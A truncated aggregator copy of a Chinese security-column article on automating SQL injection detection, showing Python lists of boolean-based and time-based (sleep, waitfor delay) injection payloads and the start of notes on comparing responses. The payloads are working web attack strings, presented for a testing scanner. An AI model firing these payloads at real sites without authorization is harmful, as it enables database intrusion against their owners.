专栏名称: 信安之路
只分享干货,不扯蛋不蹭热点,共同学习共同成长,一起踏上信息安全之路!
目录
相关文章推荐
贵州市场监管  ·  全国首发!《无堂食外卖聚集区管理规范》出台, ... ·  13 小时前  
贵州市场监管  ·  全国首发!《无堂食外卖聚集区管理规范》出台, ... ·  13 小时前  
计算机与网络安全  ·  生成式AI展望报告 ·  昨天  
大力如山  ·  合不合理要分情况啊! ·  昨天  
大力如山  ·  合不合理要分情况啊! ·  昨天  
计算机与网络安全  ·  渗透测试工程师(高级)证书(终身有效)靶场+ ... ·  2 天前  
51好读  ›  专栏  ›  信安之路

高效检测 SQL 注入漏洞,自动化实战经验分享

信安之路  · 公众号  · 互联网安全  · 2025-02-18 11:05

正文

请到「今天看啥」查看全文


4、针对参数进行布尔注入验证,例如常用的 and 1=1 这样的参数,主要 payload 参考:

#判断是否存在 bool 型注入,计算页面相似度bool_common_payload = [["1/**/and+3=3", "1/**/and+3=6"], ["'and'c'='c", "'and'd'='f"], ["%'and'%'='", "%'and'%'='d"]]

5、最后检查参数是否存在延时注入,通过判断延时的请求时间来判断是否存在注入,延时 payload 参考:

time_common_payload =[["'and(select*from(select+sleep(6))a/**/union/**/select+1)='", "'and(select*from(select+sleep(1))a/**/union/**/select+1)='"], ["(select*from(select+sleep(6)union/**/select+1)a)", "(select*from(select+sleep(1)union/**/select+1)a)"],["/**/and(select+1)>0waitfor/**/delay'0:0:6'/**/", "/**/and(select+1)>0waitfor/**/delay'0:0:1'/**/"], ["'and(select+1)>0waitfor/**/delay'0:0:6", "'and(select+1)>0waitfor/**/delay'0:0:1"]]

关键点

在实现的过程中,最为关键的部分就是判断两次请求的页面是否一致,并且排除一些错误干扰,主要有以下几点:

1、状态码判断,两次请求的状态码是否一致







请到「今天看啥」查看全文